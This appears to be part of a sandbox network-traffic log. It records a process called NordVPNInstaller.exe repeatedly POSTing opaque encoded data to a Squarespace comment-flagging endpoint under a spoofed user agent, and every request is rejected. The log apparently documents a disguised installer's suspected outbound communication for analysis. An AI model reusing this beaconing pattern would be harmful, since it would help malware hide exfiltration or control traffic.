2024-09-01 19:56:32 UTC	16306	OUT	Data Raw: 35 64 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 Data Ascii: 5dUPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7Ch
2024-09-01 19:56:32 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:32 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUhW97RXLidPZmIyNWUzNzgyYTAxYmU1Y2E4Mzc1NmM0ZmIyNDZl; Path=/; Secure Set-Cookie: crumb=BYAd97MrwbGbNjkyMTgyY2U1NmNjYzE1YzNmZjA1MDE0ZDE1MGIy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WBKWQspv/ZS4T1J1m Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYAd97MrwbGbNjkyMTgyY2U1NmNjYzE1YzNmZjA1MDE0ZDE1MGIy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49802	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:32 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:32 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:32 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:32 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bdw71iHWVMCUODAzMzhkOGExMTE3M2U0NWM0MDc4YjUzM2Q2YTY5; Path=/; Secure Set-Cookie: crumb=BSFlR5Oo9pr6Mzg5N2I1NzY4NmIyNzVkOGUwZWU4ODZhYmJlOTgx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: q9gCUenX/gjp6oesR Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSFlR5Oo9pr6Mzg5N2I1NzY4NmIyNzVkOGUwZWU4ODZhYmJlOTgx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49803	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:32 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:32 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 65 55 6b 55 5a 66 50 61 55 57 30 72 79 6d 43 63 5a 6a 77 6e 6c 35 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjeUkUZfPaUW0rymCcZjwnl5IwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:32 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:32 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXZlc-Lsd4C7NmIyMjMzMTUyMDhkMjI5MGZhYmRlMDE0NTc5ZjZi; Path=/; Secure Set-Cookie: crumb=BfVP2GCtKC6IMjU4NzE0MzVjNjEzODc4OWJhNzk3MDdmMTNkNjEw; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 3pleS8WS/4NeoJzRk Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfVP2GCtKC6IMjU4NzE0MzVjNjEzODc4OWJhNzk3MDdmMTNkNjEw"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49804	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:32 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:32 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 65 55 6b 55 5a 66 50 61 55 57 30 34 57 4d 6f 74 5a 7a 6f 76 35 70 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjeUkUZfPaUW04WMotZzov5pIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:33 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:32 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdSaQgVOKc3CMTFhOTY1ZTNmNzkxYjI0YzBiMzUyMjQ5NjFlMTli; Path=/; Secure Set-Cookie: crumb=BXjpX_auHOeFYWU2N2Q4NjJlZTJlZWY3YThiZDc4MDEyMmMxOTg4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Zit7WIFp/ZrzzrUYD Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXjpX_auHOeFYWU2N2Q4NjJlZTJlZWY3YThiZDc4MDEyMmMxOTg4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49805	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:32 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:32 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:33 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:32 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSRdTEvGrgPdZDEzMWVkMDJjNmYwNWUyZjQzZGU4YzI0NmI1ODM1; Path=/; Secure Set-Cookie: crumb=BeDEnS8v4jYJOGI5Nzg1ZjBlZDE1MzBhNGNlYTY1NzkwZGI5ODI1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: KdlFbejr/4MKYjXQt Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeDEnS8v4jYJOGI5Nzg1ZjBlZDE1MzBhNGNlYTY1NzkwZGI5ODI1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49806	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:33 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:33 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:33 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 65 55 6b 55 5a 66 50 61 55 57 30 34 57 4d 6f 74 5a 7a 6f 76 35 70 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjeUkUZfPaUW04WMotZzov5pIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:33 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:33 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSTkjKQOKZkHNjBiMzJjZWNhNzQ4OWQ4YWM3ODVmNjMwMzg1ZmFh; Path=/; Secure Set-Cookie: crumb=Bfr5ZFHI-ZY6ZWI2N2U1ODY0YTEyODE0ODFhNmZjMDdlYzNhMjVm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: jf8OlrIt/MH8dTOef Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bfr5ZFHI-ZY6ZWI2N2U1ODY0YTEyODE0ODFhNmZjMDdlYzNhMjVm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49807	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:33 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:33 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:33 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:33 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:33 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbesjRxrdv7rNGIxZDdkYzU4ZTM5ZGI3NjkzM2FkY2UzZTg1NTVj; Path=/; Secure Set-Cookie: crumb=BfrUrFkK-X_lYTI5NzA2YmY1ZDAzMDk0N2VlYmRlMDc3OTBhZmUz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: giAvFl3r/q2A2NmOA Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfrUrFkK-X_lYTI5NzA2YmY1ZDAzMDk0N2VlYmRlMDc3OTBhZmUz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49808	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:34 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:34 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:34 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:34 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:34 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSdq-ZYhmdleNDQwZmIwY2Q1NzZhNTNlMThiZGVmZDdhMDIxMzhm; Path=/; Secure Set-Cookie: crumb=BSx5frUc_7DCZGEzOWYwZDI1MjY3MjVlM2IyMjNkYWUwMzU5MWNi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 3nMZqUrH/PaCi03Yy Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSx5frUc_7DCZGEzOWYwZDI1MjY3MjVlM2IyMjNkYWUwMzU5MWNi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49809	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:34 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:34 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:34 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:34 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:34 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcvXxZSG2WqrYjM1OGUwZDNjYzk4MDkzYjM2MDFjNmEwMmU0M2Zh; Path=/; Secure Set-Cookie: crumb=BZGLYgZYtkI0ZjZkMDA1M2U1OTJiMmRiZjhmMWZjYWJlOGMzZmM3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: bbsBbetS/g5svaAnD Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZGLYgZYtkI0ZjZkMDA1M2U1OTJiMmRiZjhmMWZjYWJlOGMzZmM3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49811	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:34 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:35 UTC	25	IN	HTTP/1.1 100 Continue
